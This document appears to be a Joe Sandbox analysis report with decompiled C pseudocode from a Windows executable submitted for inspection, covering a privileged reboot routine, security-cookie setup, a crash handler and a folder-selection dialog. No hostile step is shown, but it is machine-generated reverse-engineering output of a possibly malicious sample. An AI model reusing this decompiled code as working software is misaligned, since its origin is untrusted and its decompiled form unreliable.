                                                                                                                                                                                                                                            				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                            				int _t28;
                                                                                                                                                                                                                                            				signed char _t30;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t41 = __esi;
                                                                                                                                                                                                                                            				_t38 = __edi;
                                                                                                                                                                                                                                            				_t30 = __ecx;
                                                                                                                                                                                                                                            				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						if( *0x8d9a40 != 0) {
                                                                                                                                                                                                                                            							_pop(_t30);
                                                                                                                                                                                                                                            							_t44 = _t46;
                                                                                                                                                                                                                                            							_t13 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                            							_push(_t38);
                                                                                                                                                                                                                                            							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                            								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                            								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                            								_v12 = 2;
                                                                                                                                                                                                                                            								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                            								CloseHandle(_v28);
                                                                                                                                                                                                                                            								_t41 = _t41;
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								if(_t21 != 0) {
                                                                                                                                                                                                                                            									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                            										_t25 = 1;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t37 = 0x4f7;
                                                                                                                                                                                                                                            										goto L3;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t37 = 0x4f6;
                                                                                                                                                                                                                                            									goto L4;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t37 = 0x4f5;
                                                                                                                                                                                                                                            								L3:
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								L4:
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								E008D44B9(0, _t37);
                                                                                                                                                                                                                                            								_t25 = 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_pop(_t40);
                                                                                                                                                                                                                                            							return E008D6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t37 = 0x522;
                                                                                                                                                                                                                                            						_t28 = E008D44B9(0, 0x522, 0x8d1140, 0, 0x40, 4);
                                                                                                                                                                                                                                            						if(_t28 != 6) {
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					__eax = E008D1EA7(__ecx);
                                                                                                                                                                                                                                            					if(__eax != 2) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						return _t28;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                            0x008d1f90
                                                                                                                                                                                                                                            0x008d1f90
                                                                                                                                                                                                                                            0x008d1f93
                                                                                                                                                                                                                                            0x008d1f98
                                                                                                                                                                                                                                            0x008d1fa4
                                                                                                                                                                                                                                            0x008d1fa7
                                                                                                                                                                                                                                            0x008d1fc5
                                                                                                                                                                                                                                            0x008d1fcd
                                                                                                                                                                                                                                            0x008d1fdb
                                                                                                                                                                                                                                            0x008d1ee5
                                                                                                                                                                                                                                            0x008d1eea
                                                                                                                                                                                                                                            0x008d1ef1
                                                                                                                                                                                                                                            0x008d1ef4
                                                                                                                                                                                                                                            0x008d1f0c
                                                                                                                                                                                                                                            0x008d1f2e
                                                                                                                                                                                                                                            0x008d1f3a
                                                                                                                                                                                                                                            0x008d1f46
                                                                                                                                                                                                                                            0x008d1f4d
                                                                                                                                                                                                                                            0x008d1f58
                                                                                                                                                                                                                                            0x008d1f60
                                                                                                                                                                                                                                            0x008d1f61
                                                                                                                                                                                                                                            0x008d1f62
                                                                                                                                                                                                                                            0x008d1f75
                                                                                                                                                                                                                                            0x008d1f80
                                                                                                                                                                                                                                            0x008d1f77
                                                                                                                                                                                                                                            0x008d1f77
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1f77
                                                                                                                                                                                                                                            0x008d1f64
                                                                                                                                                                                                                                            0x008d1f64
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1f64
                                                                                                                                                                                                                                            0x008d1f0e
                                                                                                                                                                                                                                            0x008d1f0e
                                                                                                                                                                                                                                            0x008d1f13
                                                                                                                                                                                                                                            0x008d1f13
                                                                                                                                                                                                                                            0x008d1f14
                                                                                                                                                                                                                                            0x008d1f14
                                                                                                                                                                                                                                            0x008d1f16
                                                                                                                                                                                                                                            0x008d1f17
                                                                                                                                                                                                                                            0x008d1f1a
                                                                                                                                                                                                                                            0x008d1f1f
                                                                                                                                                                                                                                            0x008d1f1f
                                                                                                                                                                                                                                            0x008d1f86
                                                                                                                                                                                                                                            0x008d1f8f
                                                                                                                                                                                                                                            0x008d1fcf
                                                                                                                                                                                                                                            0x008d1fd3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1fd3
                                                                                                                                                                                                                                            0x008d1fa9
                                                                                                                                                                                                                                            0x008d1fb4
                                                                                                                                                                                                                                            0x008d1fbb
                                                                                                                                                                                                                                            0x008d1fc3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1fc3
                                                                                                                                                                                                                                            0x008d1f9a
                                                                                                                                                                                                                                            0x008d1f9a
                                                                                                                                                                                                                                            0x008d1fa2
                                                                                                                                                                                                                                            0x008d1fd9
                                                                                                                                                                                                                                            0x008d1fda
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1fa2

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 008D1EFB
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 008D1F02
                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 008D1FD3
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                            • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                            • Opcode ID: fdc82a6871a57fc7ead5e5b2c460af2c4f351a845105087d5e91abd218755feb
                                                                                                                                                                                                                                            • Instruction ID: 6de922ef97c9da33a1ffcd3981826d91b52f7c3972b823fca872a6a73075adb9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fdc82a6871a57fc7ead5e5b2c460af2c4f351a845105087d5e91abd218755feb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80219471A41205BBDF205BA5DC4EFBB77B8FF85B10F20021BFA06E6281DB7488419666
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D7155() {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				struct _FILETIME _v16;
                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                            				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_t23 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                            					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                                                            					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                            					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                            					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                            					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                            					_t39 = _t36;
                                                                                                                                                                                                                                            					if(_t36 == 0xbb40e64e || ( *0x8d8004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                            						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                            						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0x8d8004 = _t39;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t37 =  !_t36;
                                                                                                                                                                                                                                            				 *0x8d8008 = _t37;
                                                                                                                                                                                                                                            				return _t37;
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x008d715d
                                                                                                                                                                                                                                            0x008d7161
                                                                                                                                                                                                                                            0x008d7165
                                                                                                                                                                                                                                            0x008d7178
                                                                                                                                                                                                                                            0x008d7182
                                                                                                                                                                                                                                            0x008d718e
                                                                                                                                                                                                                                            0x008d7197
                                                                                                                                                                                                                                            0x008d71a0
                                                                                                                                                                                                                                            0x008d71b1
                                                                                                                                                                                                                                            0x008d71b8
                                                                                                                                                                                                                                            0x008d71c4
                                                                                                                                                                                                                                            0x008d71c7
                                                                                                                                                                                                                                            0x008d71cb
                                                                                                                                                                                                                                            0x008d71d5
                                                                                                                                                                                                                                            0x008d71da
                                                                                                                                                                                                                                            0x008d71da
                                                                                                                                                                                                                                            0x008d71dc
                                                                                                                                                                                                                                            0x008d71dc
                                                                                                                                                                                                                                            0x008d71e2
                                                                                                                                                                                                                                            0x008d71e5
                                                                                                                                                                                                                                            0x008d71ee

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 008D7182
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 008D7191
                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 008D719A
                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 008D71A3
                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 008D71B8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1445889803-0
                                                                                                                                                                                                                                            • Opcode ID: 1cb276f60c2cadf43348e501ee8346f0c88a3587de49753de46845bef56d0231
                                                                                                                                                                                                                                            • Instruction ID: 3874f5397ad79fd2c8cee38a3b0a5bd975c8a954c12f58d7e4c4205f173bde63
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1cb276f60c2cadf43348e501ee8346f0c88a3587de49753de46845bef56d0231
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B110A71D06608DBCF14DFB8DA48A9EB7F4FF48315F654A67D806E7210EA309E048B41
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D6CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                            				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                            0x008d6cf7
                                                                                                                                                                                                                                            0x008d6d00
                                                                                                                                                                                                                                            0x008d6d19

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,008D6E26,008D1000), ref: 008D6CF7
                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(008D6E26,?,008D6E26,008D1000), ref: 008D6D00
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409,?,008D6E26,008D1000), ref: 008D6D0B
                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,008D6E26,008D1000), ref: 008D6D12
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3231755760-0
                                                                                                                                                                                                                                            • Opcode ID: 841a4aa6bdc423038d7a001c6c02f8bae525147a5c950fbeb30b1c33fb31e907
                                                                                                                                                                                                                                            • Instruction ID: f50b7644f3bb1b376a67528f2a30b458ed20a50dcdf88a3d83596a839a99f78c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 841a4aa6bdc423038d7a001c6c02f8bae525147a5c950fbeb30b1c33fb31e907
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60D0C932001108FBDF042BF1EC0CA593F28FB48222F644102F31B82020CA3244518B52
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                                                                            			E008D3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				int _t20;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				int _t23;
                                                                                                                                                                                                                                            				char _t24;
                                                                                                                                                                                                                                            				long _t25;
                                                                                                                                                                                                                                            				int _t27;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                            				int _t38;
                                                                                                                                                                                                                                            				int _t39;
                                                                                                                                                                                                                                            				void* _t42;
                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                            				CHAR* _t49;
                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				struct HWND__* _t64;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t64 = _a4;
                                                                                                                                                                                                                                            				_t6 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t6 == 0) {
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					L38:
                                                                                                                                                                                                                                            					EndDialog(_t64, ??);
                                                                                                                                                                                                                                            					L39:
                                                                                                                                                                                                                                            					__eflags = 1;
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t42 = 1;
                                                                                                                                                                                                                                            				_t10 = _t6 - 0x100;
                                                                                                                                                                                                                                            				if(_t10 == 0) {
                                                                                                                                                                                                                                            					E008D43D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                                                            					SetWindowTextA(_t64, "lenta");
                                                                                                                                                                                                                                            					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                                                            					__eflags =  *0x8d9a40 - _t42; // 0x3
                                                                                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                                                                                            						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L36:
                                                                                                                                                                                                                                            					return _t42;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t10 == _t42) {
                                                                                                                                                                                                                                            					_t20 = _a12 - 1;
                                                                                                                                                                                                                                            					__eflags = _t20;
                                                                                                                                                                                                                                            					if(_t20 == 0) {
                                                                                                                                                                                                                                            						_t21 = GetDlgItemTextA(_t64, 0x835, 0x8d91e4, 0x104);
                                                                                                                                                                                                                                            						__eflags = _t21;
                                                                                                                                                                                                                                            						if(_t21 == 0) {
                                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                                            							_t58 = 0x4bf;
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0x10);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                                            							E008D44B9(_t64, _t58);
                                                                                                                                                                                                                                            							goto L39;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t49 = 0x8d91e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t23 =  *_t49;
                                                                                                                                                                                                                                            							_t49 =  &(_t49[1]);
                                                                                                                                                                                                                                            							__eflags = _t23;
                                                                                                                                                                                                                                            						} while (_t23 != 0);
                                                                                                                                                                                                                                            						__eflags = _t49 - 0x8d91e5 - 3;
                                                                                                                                                                                                                                            						if(_t49 - 0x8d91e5 < 3) {
                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t24 =  *0x8d91e5; // 0x3a
                                                                                                                                                                                                                                            						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                                                            						if(_t24 == 0x3a) {
                                                                                                                                                                                                                                            							L21:
                                                                                                                                                                                                                                            							_t25 = GetFileAttributesA(0x8d91e4);
                                                                                                                                                                                                                                            							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                                                            							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            								L26:
                                                                                                                                                                                                                                            								E008D658A(0x8d91e4, 0x104, 0x8d1140);
                                                                                                                                                                                                                                            								_t27 = E008D58C8(0x8d91e4);
                                                                                                                                                                                                                                            								__eflags = _t27;
                                                                                                                                                                                                                                            								if(_t27 != 0) {
                                                                                                                                                                                                                                            									__eflags =  *0x8d91e4 - 0x5c;
                                                                                                                                                                                                                                            									if( *0x8d91e4 != 0x5c) {
                                                                                                                                                                                                                                            										L30:
                                                                                                                                                                                                                                            										_t30 = E008D597D(0x8d91e4, 1, _t64, 1);
                                                                                                                                                                                                                                            										__eflags = _t30;
                                                                                                                                                                                                                                            										if(_t30 == 0) {
                                                                                                                                                                                                                                            											L35:
                                                                                                                                                                                                                                            											_t42 = 1;
                                                                                                                                                                                                                                            											__eflags = 1;
                                                                                                                                                                                                                                            											goto L36;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                                            										_t42 = 1;
                                                                                                                                                                                                                                            										EndDialog(_t64, 1);
                                                                                                                                                                                                                                            										goto L36;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									__eflags =  *0x8d91e5 - 0x5c;
                                                                                                                                                                                                                                            									if( *0x8d91e5 == 0x5c) {
                                                                                                                                                                                                                                            										goto L31;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L30;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_t58 = 0x4be;
                                                                                                                                                                                                                                            								goto L25;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t32 = E008D44B9(_t64, 0x54a, 0x8d91e4, 0, 0x20, 4);
                                                                                                                                                                                                                                            							__eflags = _t32 - 6;
                                                                                                                                                                                                                                            							if(_t32 != 6) {
                                                                                                                                                                                                                                            								goto L35;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t33 = CreateDirectoryA(0x8d91e4, 0);
                                                                                                                                                                                                                                            							__eflags = _t33;
                                                                                                                                                                                                                                            							if(_t33 != 0) {
                                                                                                                                                                                                                                            								goto L26;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0x10);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0x8d91e4);
                                                                                                                                                                                                                                            							_t58 = 0x4cb;
                                                                                                                                                                                                                                            							goto L25;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags =  *0x8d91e4 - 0x5c;
                                                                                                                                                                                                                                            						if( *0x8d91e4 != 0x5c) {
                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                                                            						if(_t24 != 0x5c) {
                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L21;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t34 = _t20 - 1;
                                                                                                                                                                                                                                            					__eflags = _t34;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						EndDialog(_t64, 0);
                                                                                                                                                                                                                                            						 *0x8d9124 = 0x800704c7;
                                                                                                                                                                                                                                            						goto L39;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t34 != 0x834;
                                                                                                                                                                                                                                            					if(_t34 != 0x834) {
                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t37 = LoadStringA( *0x8d9a3c, 0x3e8, 0x8d8598, 0x200);
                                                                                                                                                                                                                                            					__eflags = _t37;
                                                                                                                                                                                                                                            					if(_t37 != 0) {
                                                                                                                                                                                                                                            						_t38 = E008D4224(_t64, _t46, _t46);
                                                                                                                                                                                                                                            						__eflags = _t38;
                                                                                                                                                                                                                                            						if(_t38 == 0) {
                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t39 = SetDlgItemTextA(_t64, 0x835, 0x8d87a0);
                                                                                                                                                                                                                                            						__eflags = _t39;
                                                                                                                                                                                                                                            						if(_t39 != 0) {
                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t63 = 0x4c0;
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						E008D44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						goto L38;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t63 = 0x4b1;
                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}

























                                                                                                                                                                                                                                            0x008d321b
                                                                                                                                                                                                                                            0x008d321e
                                                                                                                                                                                                                                            0x008d3221
                                                                                                                                                                                                                                            0x008d343c
                                                                                                                                                                                                                                            0x008d343e
                                                                                                                                                                                                                                            0x008d343f
                                                                                                                                                                                                                                            0x008d3445
                                                                                                                                                                                                                                            0x008d3447
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3447
                                                                                                                                                                                                                                            0x008d3229
                                                                                                                                                                                                                                            0x008d322a
                                                                                                                                                                                                                                            0x008d322f
                                                                                                                                                                                                                                            0x008d33ec
                                                                                                                                                                                                                                            0x008d33f7
                                                                                                                                                                                                                                            0x008d3410
                                                                                                                                                                                                                                            0x008d3416
                                                                                                                                                                                                                                            0x008d341d
                                                                                                                                                                                                                                            0x008d342d
                                                                                                                                                                                                                                            0x008d342d
                                                                                                                                                                                                                                            0x008d3438
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3438
                                                                                                                                                                                                                                            0x008d3237
                                                                                                                                                                                                                                            0x008d3243
                                                                                                                                                                                                                                            0x008d3243
                                                                                                                                                                                                                                            0x008d3246
                                                                                                                                                                                                                                            0x008d32ee
                                                                                                                                                                                                                                            0x008d32f4
                                                                                                                                                                                                                                            0x008d32f6
                                                                                                                                                                                                                                            0x008d33d4
                                                                                                                                                                                                                                            0x008d33d6
                                                                                                                                                                                                                                            0x008d33db
                                                                                                                                                                                                                                            0x008d33dc
                                                                                                                                                                                                                                            0x008d33de
                                                                                                                                                                                                                                            0x008d33df
                                                                                                                                                                                                                                            0x008d3370
                                                                                                                                                                                                                                            0x008d3372
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3372
                                                                                                                                                                                                                                            0x008d32fc
                                                                                                                                                                                                                                            0x008d3301
                                                                                                                                                                                                                                            0x008d3301
                                                                                                                                                                                                                                            0x008d3303
                                                                                                                                                                                                                                            0x008d3304
                                                                                                                                                                                                                                            0x008d3304
                                                                                                                                                                                                                                            0x008d330a
                                                                                                                                                                                                                                            0x008d330d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3313
                                                                                                                                                                                                                                            0x008d3318
                                                                                                                                                                                                                                            0x008d331a
                                                                                                                                                                                                                                            0x008d3331
                                                                                                                                                                                                                                            0x008d3332
                                                                                                                                                                                                                                            0x008d333a
                                                                                                                                                                                                                                            0x008d333d
                                                                                                                                                                                                                                            0x008d337c
                                                                                                                                                                                                                                            0x008d3388
